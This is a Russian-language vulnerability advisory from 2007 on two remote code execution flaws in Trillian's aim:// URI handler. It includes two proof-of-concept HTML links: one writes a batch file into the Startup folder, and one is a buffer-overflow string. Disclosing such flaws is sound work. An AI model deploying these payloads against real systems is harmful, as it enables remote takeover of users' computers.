Security Lab

Несколько уязвимостей в Trillian

Дата публикации:17.07.2007
Дата изменения:22.09.2007
Всего просмотров:1906
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: CVE-2007-3832
CVE-2007-3833
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Trillian Basic 3.x
Trillian Pro 3.x
Уязвимые версии: Trillian Basic 3.1.6.0, возможно другие версии.

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольный код на целевой системе.

1. Уязвимость существует из-за того, что aim:// URI обработчик не проверяет aim://" URI перед записью данных в файл, указанный в параметре "ini=". Удаленный пользователь может с помощью специально сформированного "aim://" URI записать произвольные файлы на целевую систему. Пример:

<a href = 'aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"'>#1</a>

2. Уязвимость существует из-за ошибки проверки границ данных при обработке "aim://" URI в плагине aim.dll. Удаленный пользователь может с помощью специально сформированного "aim://" URI вызвать переполнение буфера и выполнить произвольный код на целевой системе. Пример:

<a href = 'aim:///#1111111/111111111111111111111111111111111111111111111111111
111111111122222222222222222222222222222222222222222222222222222222222222
222222222222222222222222222222222222222222222222222222222222222222222222
22222222222222222222222222222222222222222222222226666666AAAABBBB66666
666666666666666666666666666666666666666666666666666666666666666666666666
666666666666666666666666666666666666666666666666666666666666666666666666
666666666666666666666666666666666666666666666666666666666666666666666666
66666666666666666666666'>#2</a>

URL производителя: www.ceruleanstudios.com

Решение: Установите последнюю версию 3.1.7.0 с сайта производителя.

Ссылки: http://www.xs-sniper.com/nmcfeters/Cross-App-Scripting-2.html